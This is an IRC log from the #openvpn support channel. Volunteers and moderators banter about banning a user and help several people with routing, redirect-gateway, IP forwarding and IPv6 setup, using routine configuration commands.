a matter of time til he got himself banned 12:33 <+EugeneKay> I tried to be patient, really I did. 12:34 <@krzee> i believe dazo ignored him at the same time 12:34 <@krzee> haha 12:34 <+EugeneKay> And I just realized I'm wearing my OpenVPN shirt 12:34 <@krzee> [13:33] that lil outburst won you a /ig lol 12:34 <@krzee> [13:34] *!*lol2@2-226-37-187.ip179.fastwebnet.it added to ignore list. 12:34 <@krzee> [13:34] * dazo follows krzee's example 12:35 * EugeneKay gets beer 12:35 <@ecrist> lol 12:36 <@ecrist> krzee: btw, we got our OSPF + OpenVPN working smoothly now 12:36 <@krzee> badass! 12:36 <+EugeneKay> Shiny 12:36 <@ecrist> with redundancy and failover, as well 12:36 <@ecrist> :D 12:37 <@krzee> my ospf is held together by magic 12:37 < pekster> Not More Magic? 
12:38 <@ecrist> FreeBSD + Bird + OpenVPN = win 12:38 <+hazardous> i just scrolled up 12:38 <@krzee> ++ 12:38 <+hazardous> he wasn't even referring to AS 12:38 <@ecrist> hazardous: nobody said he was 12:38 <+hazardous> i kinda giggled 12:38 -!- IceGuest_77 [~IceChat77@smtp.utiglobal.net] has joined #openvpn 12:38 -!- IceGuest_77 is now known as IceGuest_77_ 12:39 < pekster> http://www.catb.org/jargon/html/magic-story.html 12:39 <@vpnHelper> Title: A Story About 'Magic' (at www.catb.org) 12:39 <+EugeneKay> PrivateTunnel.msi is the AS client 12:40 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 12:40 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded] 12:40 <@ecrist> wrapped in a different logo, with other config goo, iirc 12:40 <@krzee> pekster, im lol'ing 12:40 -!- IceGuest_77_ is now known as computron 12:40 <+hazardous> ecrist: yeah that was my thought, it's AS but proprietarily configured and other stuff 12:41 <@novaflash> hey i heard you guys kicked a private tunnel user 12:41 <+hazardous> anyways, he's now in the as channel complaining about his ban and asking about privatetunnel 12:41 <+hazardous> hahahaha 12:41 <@ecrist> novaflash: yup 12:41 <@novaflash> good job 12:41 <@novaflash> ;) 12:41 <@ecrist> :D 12:41 <@krzee> LOL 12:41 <@novaflash> just tell him to go to support@privatetunnel.com 12:41 <@ecrist> novaflash: welcome to the suck 12:41 <@novaflash> maybe we should have a factoid here 12:41 <@novaflash> like !pt omg fuck off to support@privatetunnel.com already 12:41 <@krzee> !learn privatetunnel as go to support@privatetunnel.com for support! 12:41 <@vpnHelper> Joo got it. 12:41 <@novaflash> thanks 12:41 <@novaflash> that'll work nicely 12:42 <@krzee> !learn pt as [privatetunnel] 12:42 < computron> Hey guys quick question i am trying to reset the admin account password from cmdline can anyone help me out with that? 12:42 <@vpnHelper> Joo got it. 
12:42 <@krzee> !pt 12:42 <@vpnHelper> "pt" is "privatetunnel" is go to support@privatetunnel.com for support! 12:42 <@novaflash> computron: is this for access server? 12:42 < computron> yes novaflash 12:42 <+EugeneKay> !as 12:42 <@krzee> !as 12:42 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 12:42 <+hazardous> why are you asking in here?! 12:42 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 12:42 < computron> will do thanks for the direction!! 12:42 <+hazardous> yay 12:42 <+EugeneKay> Some day we shall teach people to read the /topic 12:42 <+EugeneKay> But not today 12:43 < pekster> Here and the rest of Freenode... 12:43 <@novaflash> computron: then join #openvpn-as please 12:45 <@ecrist> reading pekster's link, I immediately feel like an EE geek of some sort, having promptly thought what was listed at the end as a possible explanation 12:47 < pekster> Yea, some capacitive reactance or something. It's still a cool story that I've loved re-reading now and then 12:48 <+EugeneKay> !fail2ban 12:48 <@vpnHelper> "fail2ban" is in linux you can replace fail2ban without the background process with something like: iptables -A INPUT -m tcp -p tcp --dport 22 -m hashlimit --hashlimit-name ssh --hashlimit-upto 5/minute --hashlimit-mode srcip --hashlimit-srcmask 24 -j ACCEPT 12:49 <+hazardous> i think the guy you banned is about to make novaflash cry 12:49 <+hazardous> lol 12:50 <@krzee> lol 12:50 * EugeneKay gets a hanky ready 12:50 <@ecrist> !magic 12:50 <+hazardous> what's !magic do 12:50 <@novaflash> no worries mate 12:50 <+EugeneKay> Nothing, it seems. 12:50 <@novaflash> guys like these, i eat for breakfast 12:50 <@ecrist> !learn magic as For a story about magic read http://www.catb.org/jargon/html/magic-story.html 12:50 <@vpnHelper> Error: You don't have the factoids.learn capability. If you think that you should have this capability, be sure that you are identified before trying again. 
The 'whoami' command can tell you if you're identified. 12:50 <+hazardous> novaflash: seriously i pity you dealing with people like this all day 12:50 <@krzee> nice 12:50 <@ecrist> fuck you, vpnHelper 12:50 <@ecrist> !whoami 12:50 <@vpnHelper> ecrist 12:50 <@krzee> !learn magic as For a story about magic read http://www.catb.org/jargon/html/magic-story.html 12:50 <@vpnHelper> Joo got it. 12:50 <@novaflash> dealing with krzee is much tougher 12:50 <@ecrist> thanks 12:50 <@krzee> bro i told you you needed to fix you on the bot 12:51 <@krzee> i fubar'ed it by accident 12:51 <@ecrist> I DID 12:51 <@krzee> sorry 12:51 <@krzee> oh, shit 12:51 <@ecrist> or did you fuck it up again 12:51 <@krzee> i guess it got fubared again 12:51 <@krzee> nah only 1x 12:51 <@ecrist> lol 12:51 <+EugeneKay> You must not have added me again 12:51 <@krzee> did you do the permissions like i had? 12:51 <@krzee> cause i did those right, a bunch were messed up before 12:51 <@dazo> pekster: ecrist: I spoke with a guy who did computer lab work in the early 80s ... they had stability issues with a server, and an expert from the UK came over ... looked at the circuit board, took out a knife and destroyed one of the connections to a pin ... and the server was completely stable ever since 12:53 <+EugeneKay> I'm a fan of percussive maintenance 12:54 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 12:54 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 12:55 <@dazo> hehe 12:56 <@dazo> EugeneKay: I'm sometimes tempted to use that on computer users asking for support for the nth time as well .... 
12:56 <+EugeneKay> https://www.xkcd.com/1180/ 12:56 <@vpnHelper> Title: xkcd: Virus Venn Diagram (at www.xkcd.com) 12:57 < pekster> I don't mind helping with language or when lack of the right resources is the issue, but when someone actively refuses to read the resources, it's eventually a waste of time :\ 12:57 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 276 seconds] 12:58 <@dazo> pekster++ 12:59 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 256 seconds] 13:03 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:03 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 13:04 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 13:05 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:05 -!- mode/#openvpn [+o krzee] by ChanServ 13:05 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has joined #openvpn 13:05 < Azrael_-> hi 13:07 < Azrael_-> i've got a small problem: one client worked perfectly, i moved it to a different location (other city) and fired it up. now the tunnel works, ping works but i can't access the network shares of windows. before moving it worked. other clients work just fine. any ideas? 13:08 < pekster> You're trying to access file shares from the client at the VPN IP, or on a PC on a LAN behind the server? 13:08 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 13:08 <+EugeneKay> Something something DNS 13:08 <@krzee> did you move to a location where you are on the same subnet as the lan you're trying to access over the vpn? 13:08 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:08 < Azrael_-> i access the share using ip, no names 13:09 < Azrael_-> krzee: if it was, the ping wouldn't work 13:09 <+EugeneKay> You'd be surprised 13:09 <@krzee> access share using LAN ip or VPN ip? 
13:09 < pekster> Not if there was a duplicate machine with the same IP locally, or something redirecting the pings 13:09 < pekster> krzee: IPv6 fixes that. #justsaying ;) 13:09 <@krzee> pekster, :-p 13:10 <@krzee> not if everyone uses the same local subnet in ipv6 13:10 <@krzee> there's plenty for use in ipv4, people just get retarded and always use the same ones 13:10 < Azrael_-> i've used 10.8.0.x for openvpn and the local net is in 192.168.0.x 13:11 <+EugeneKay> Something changed. Find it. 13:11 <@krzee> and what ip are you mounting the share from 13:11 < Azrael_-> EugeneKay: as long as i don't have the slightest clue it's getting difficult 13:11 <@krzee> (for the third time) 13:11 < Azrael_-> krzee: 10.8.0.1 13:11 < Azrael_-> sorry 13:11 <@krzee> and what machine is trying to mount a share on 10.8.0.1, the client machine? 13:12 < Azrael_-> client 10.8.0.18 -> server 10.8.0.1 (network share) 13:12 <@krzee> can the server ping the client? 13:12 < Azrael_-> yes 13:12 <@krzee> do it now 13:12 <@krzee> dont answer from prior testing 13:13 < Azrael_-> gnarf, and just now teamviewer doesn't respond. gotta let it check and then come back again. 
sorry 13:14 <@krzee> np 13:14 < Azrael_-> thanks anyway for the hints 13:15 <@krzee> with the fact that no lan sharing is involved, i'd expect there was an issue with the connection or some firewall/filter issues 13:16 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 276 seconds] 13:20 < pekster> Or possibly MTU issues; it may be wise to try a ping with the DF bit set at the max MTU of the link 13:20 -!- sh_t [~sht@NL2.privatevpn.com] has quit [Ping timeout: 256 seconds] 13:20 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 13:34 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 255 seconds] 13:37 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 13:37 -!- krzie [~k@openvpn/community/support/krzee] has joined #openvpn 13:37 -!- mode/#openvpn [+o krzie] by ChanServ 13:40 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 13:40 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn 13:42 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 13:42 -!- module000 [~module000@173-10-195-33-BusName-LittleRock.hfc.comcastbusiness.net] has joined #openvpn 13:42 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 13:43 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn 13:47 -!- module000 [~module000@173-10-195-33-BusName-LittleRock.hfc.comcastbusiness.net] has quit [Quit: module000] 13:48 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out] 13:49 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:57 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 14:00 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 14:00 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit 
[Ping timeout: 255 seconds] 14:00 -!- krzie is now known as krzee 14:03 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 14:18 -!- Devastator- [~devas@186.214.110.30] has joined #openvpn 14:18 -!- Devastator- [~devas@186.214.110.30] has quit [Changing host] 14:18 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 14:19 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 256 seconds] 14:20 -!- Saviq [~Saviq@canonical/saviq] has quit [Excess Flood] 14:21 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 14:30 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has joined #openvpn 14:36 -!- Timmy [~quassel@unaffiliated/timmyt] has joined #openvpn 14:38 < Timmy> I have a .ovpn file and a .ca file which is provided by an openvpn provider, i want to use them through the commandline. there also is a username and pass i have to enter, how can i do this? can you help me? 14:39 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 276 seconds] 14:39 -!- bjh4 [~bjh4@64.212.193.1] has quit [Remote host closed the connection] 14:40 <@dazo> Timmy: openvpn --config ovpn-file --ca ca-file --auth-user-pass 14:40 <@dazo> (--auth-user-pass may already be set in the config file, though ... --ca as well) 14:40 <@dazo> !-- 14:40 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file. 14:42 -!- dazo is now known as dazo_afk 14:42 < Timmy> dazo: then how can i enter my username and password in the commandline? something like --auth-myusername-mypassword ? 
14:42 < Timmy> dazo_afk: ^^ 14:44 -!- meepmeep [~meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 14:44 <+EugeneKay> It is not recommended to put user/pass as an argument 14:46 -!- krzee [~k@openvpn/community/support/krzee] has quit [Read error: Operation timed out] 14:47 < Timmy> this is the report of openvpn when i tried to connect: http://paste.kde.org/689000/ 14:47 < Timmy> what is the problem? 14:49 <+EugeneKay> That appears to be a client log. What's the server log look like? 14:50 < Timmy> EugeneKay: I don't have access to the server 14:51 <+EugeneKay> !both 14:51 <@vpnHelper> "both" is If you do not control both ends of the link (server and client) then there is not much we can do to help you. Please talk to your network admin instead. 15:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:13 -!- Devastator- [~devas@unaffiliated/devastator] has quit [Remote host closed the connection] 15:14 -!- Devastator [~devas@186.214.110.30] has joined #openvpn 15:29 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 15:29 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 15:29 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:29 -!- mode/#openvpn [+o krzee] by ChanServ 15:34 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 15:50 -!- Timmy [~quassel@unaffiliated/timmyt] has left #openvpn ["http://quassel-irc.org - Chat comfortably. Anywhere."] 15:52 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 16:02 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 16:05 -!- WolfX [~subzero@94.54.203.154] has joined #openvpn 16:06 < WolfX> Hi, my win7 client is connected to openvpn server on debian linux but it still browses websites directly. 
16:07 <+EugeneKay> !redirect
16:07 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
16:07 <@vpnHelper> http://ircpimps.org/redirect.png
16:07 <+EugeneKay> WolfX - follow the chart ^
16:08 < WolfX> ok thanks.
16:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds]
16:20 < WolfX> !ipforward
16:20 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
16:24 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Quit: Ex-Chat]
16:25 < WolfX> !linipforward
16:25 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
16:31 -!- Porkepix_ [~Porkepix@ks353551.kimsufi.com] has joined #openvpn
16:32 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Ping timeout: 255 seconds]
16:32 -!- Porkepix_ is now known as Porkepix
16:32 -!- speed_racer8 [~speed_rac@76.30.149.251] has quit [Quit: Leaving]
16:34 < WolfX> EugeneKay: in the chart it asks me if i can ping 8.8.8.8 but i cannot even ping VPN server ip after redirect-gateway def1 in client.ovpn in win7
16:36 < rob0> The very first box, "Can you ping the VPN IP of the server?" -> No: -> "Fix your VPN."
16:36 < rob0> A flowchart is meant to be followed in order.
16:38 < WolfX> oh, yes but i did default installation in debian according to : https://community.openvpn.net/openvpn/wiki/BridgingAndRouting exactly, and routing option is exactly my case.
16:38 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net)
16:39 < WolfX> how am i connect to the VPN server if i cannot ping it ?
16:39 < WolfX> connected*
16:43 -!- Porkepix [~Porkepix@ks353551.kimsufi.com] has quit [Ping timeout: 248 seconds]
16:43 < pekster> A "connected" VPN just means the control channel succeeded its initial connection and hasn't timed out or explicitly disconnected. Firewalls are usually the cause of connection issues after that point
16:43 < pekster> Also, why are you bridging?
16:43 < pekster> !tunortap
16:43 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
16:43 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
16:43 -!- ade_b [~Ade@koln-5d817e98.pool.mediaWays.net] has joined #openvpn
16:43 -!- ade_b [~Ade@koln-5d817e98.pool.mediaWays.net] has quit [Changing host]
16:43 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
16:44 < WolfX> pekster: i'm not, my option is routing.
16:44 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn
16:45 -!- ade_b [~Ade@redhat/adeb] has quit [Client Quit]
16:46 < pekster> At a quick skimming, that guide doesn't deal with firewall issues for connectivity between the client & peer
16:46 < pekster> It's more of a guide for after you have a working VPN. Start with that first, because nothing else works if you can't communicate properly with your VPN peer
16:46 < pekster> The official howto is:
16:46 < pekster> !howto
16:46 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
16:47 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has quit [Quit: mirco]
16:52 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has joined #openvpn
16:52 -!- computron [~IceChat77@smtp.utiglobal.net] has quit [Ping timeout: 272 seconds]
16:53 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Quit: Computer has gone to sleep.]
16:53 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
17:13 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has quit [Quit: mirco]
17:20 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Remote host closed the connection]
17:20 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
17:20 -!- mode/#openvpn [+o krzee] by ChanServ
17:20 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit []
17:24 < WolfX> i have debianPC (VPN server) and Win7(client) on the same network. I wanna install openVPN server on debian and connect internet from Win7 and pass through debian. This is for test only.
17:24 < WolfX> both have local IP behind router with 192.168.0.x ip. Is this possible or am i wasting my time trying to setup openvpn in LAN?
17:24 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 245 seconds]
17:26 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has joined #openvpn
17:26 <@krzee> possible but pointless
17:27 <@krzee> !local
17:27 <@vpnHelper> "local" is a flag for --redirect-gateway, Add the local flag if both OpenVPN machines are directly connected via a common subnet, such as with wireless.
17:27 <@krzee> !redirect
17:27 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
17:27 <@vpnHelper> http://ircpimps.org/redirect.png
17:29 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn
17:37 < WolfX> !def1
17:37 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
17:37 -!- zamba [marius@flage.org] has quit [Ping timeout: 252 seconds]
17:37 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has quit [Ping timeout: 252 seconds]
17:38 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has joined #openvpn
17:38 -!- WolfX [~subzero@94.54.203.154] has quit [Quit: Leaving.]
17:39 -!- zamba [marius@flage.org] has joined #openvpn
17:39 -!- WolfX [~subzero@94.54.203.154] has joined #openvpn
17:39 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has quit [Changing host]
17:39 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn
17:39 -!- mode/#openvpn [+o novaflash] by ChanServ
17:46 -!- mirco [~mirco@p50805D42.dip.t-dialin.net] has quit [Quit: mirco]
17:49 -!- WolfX [~subzero@94.54.203.154] has quit [Quit: Leaving.]
18:11 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
18:11 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
18:21 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Quit: Leaving]
18:38 -!- mellow89 [~mellow89@108-171-179-235.static.cloud-ips.com] has joined #openvpn
18:40 < mellow89> hi
18:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
19:01 < mellow89> does openvpn tunnel all my PC's traffic?
19:02 < rob0> by default, no, but it does do what you tell it to do.
19:02 < rob0> !redirect
19:02 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
19:02 <@vpnHelper> http://ircpimps.org/redirect.png
19:04 < mellow89> what traffic is redirected by default when you install it?
19:05 < rob0> no redirection without --redirect-gateway
19:05 < rob0> !howto
19:05 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
19:14 -!- ele_ [~maarten@pinky.elexer.com] has joined #openvpn
19:16 -!- ele [~maarten@pinky.elexer.com] has quit [Ping timeout: 264 seconds]
19:16 -!- mellow89 [~mellow89@108-171-179-235.static.cloud-ips.com] has quit [Quit: http://www.kiwiirc.com/ - A hand-crafted IRC client]
19:18 -!- mellow89 [~mellow89@108-171-179-235.static.cloud-ips.com] has joined #openvpn
19:21 -!- newbie|3 [~tjz@bb219-74-43-126.singnet.com.sg] has joined #openvpn
19:24 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 255 seconds]
19:33 -!- Devastator [~devas@186.214.110.30] has quit [Changing host]
19:33 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
19:41 -!- raidz is now known as raidz_away
19:44 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 248 seconds]
19:50 -!- WolfX [~subzero@94.54.203.154] has joined #openvpn
19:52 < mellow89> thanks
19:52 -!- mellow89 [~mellow89@108-171-179-235.static.cloud-ips.com] has quit [Quit: http://www.kiwiirc.com/ - A hand-crafted IRC client]
19:55 -!- WolfX1 [~subzero@94.54.203.154] has joined #openvpn
19:58 -!- WolfX [~subzero@94.54.203.154] has quit [Ping timeout: 256 seconds]
20:28 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
20:31 -!- mezgani [~mezgani@41.249.4.68] has joined #openvpn
20:33 -!- p3rror [~mezgani@41.140.180.37] has quit [Ping timeout: 245 seconds]
20:43 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has quit [Ping timeout: 264 seconds]
20:44 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has joined #openvpn
20:46 -!- WolfX1 [~subzero@94.54.203.154] has left #openvpn []
21:03 -!- APTX [APTX@unaffiliated/aptx] has quit [Ping timeout: 245 seconds]
21:05 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn
21:08 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn
21:29 -!- DaveTheDude [~FuckOff@69.85.93.87] has joined #openvpn
21:30 < DaveTheDude> Hey, i was in here last night asking about the latest version. Well i figured out how to get the latest version working properly... but i'm wondering how ipv6 support works.
21:31 < DaveTheDude> Doesn't this mean that i do not have ipv6 setup?
21:31 < DaveTheDude> Wed Mar 06 22:18:20 2013 us=649414 do_ifconfig, tt->ipv6=0, tt->did_ifconfig_ipv6_setup=0
21:31 < DaveTheDude> Wed Mar 06 22:18:20 2013 us=649414 MANAGEMENT: >STATE:1362626300,ASSIGN_IP,,10.8.0.6,
21:31 < DaveTheDude> Wed Mar 06 22:18:20 2013 us=649414 open_tun, tt->ipv6=0
21:33 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn
21:34 < DaveTheDude> i don't have any specific ipv6 needs. i just want any and all ipv6 traffic from home, to be routed through my remote server
21:36 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 252 seconds]
21:36 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn
21:39 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 250 seconds]
21:39 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn
21:43 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 256 seconds]
21:45 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn
21:47 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds]
21:48 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 248 seconds]
21:48 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn
21:52 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 276 seconds]
21:54 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn
21:55 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 245 seconds]
21:55 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 245 seconds]
21:56 < DaveTheDude> any ideas or help?
21:58 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn
22:01 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 252 seconds]
22:01 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn
22:05 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 245 seconds]
22:05 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn
22:06 -!- pulz_ [geir@winning.no] has quit [Read error: Operation timed out]
22:08 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 256 seconds]
22:10 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn
22:11 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 255 seconds]
22:14 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn
22:17 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 256 seconds]
22:19 -!- ravel_exe [ravel_exe@175.136.85.24] has joined #openvpn
22:20 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 245 seconds]
22:22 -!- pulz [geir@winning.no] has joined #openvpn
22:27 -!- ravel_cmd [ravel_exe@175.136.85.24] has joined #openvpn
22:31 -!- ravel_exe [ravel_exe@175.136.85.24] has quit [Ping timeout: 255 seconds]
22:33 < pekster> DaveTheDude: Look at the --tun-ipv6 option
22:33 < DaveTheDude> yes i see many options here
22:34 < DaveTheDude> the problem is that i don't exactly know how to use them
22:34 -!- ravel_cmd [ravel_exe@175.136.85.24] has quit [Ping timeout: 260 seconds]
22:34 < pekster> So, did you see/read the manpage section titled "IPv6 Related Options"
22:34 < DaveTheDude> i don't really have any specific ipv6 needs, i just want any ipv6 traffic to route through my server
22:34 < pekster> Push a route for the global IP space then
22:35 < DaveTheDude> no i didn't see a specific section that said IPv6 related options
22:36 < pekster> That'll show you all the config options you need to know
22:36 < DaveTheDude> i am reading this... https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage
22:36 <@vpnHelper> Title: Openvpn23ManPage – OpenVPN Community (at community.openvpn.net)
22:36 < pekster> Yup, that'll do fine
22:36 < DaveTheDude> yeah i see a lot of options, but when you said this " Push a route for the global IP space then"
22:36 < DaveTheDude> you lost me
22:37 < pekster> 2000::/3 is the global routable IPv6 space currently assigned
22:37 < DaveTheDude> sorry, i know how to set things up basically, but i'm still a bit of a nub
22:37 < pekster> Just like def1 in IPv4 pushes a 0/1 and 128/1 route, 2000::/3 is the v6 equivalent
22:38 < DaveTheDude> you lost me again
22:38 < DaveTheDude> that is out of my depth
22:38 < pekster> It's going to be hard to set up IPv6 if you're not familiar with IPv6 to start with
22:39 < DaveTheDude> well i don't want ipv6 to be something that isn't covered when i am connected
22:40 < DaveTheDude> how would i go about pushing a route for the global IP space?
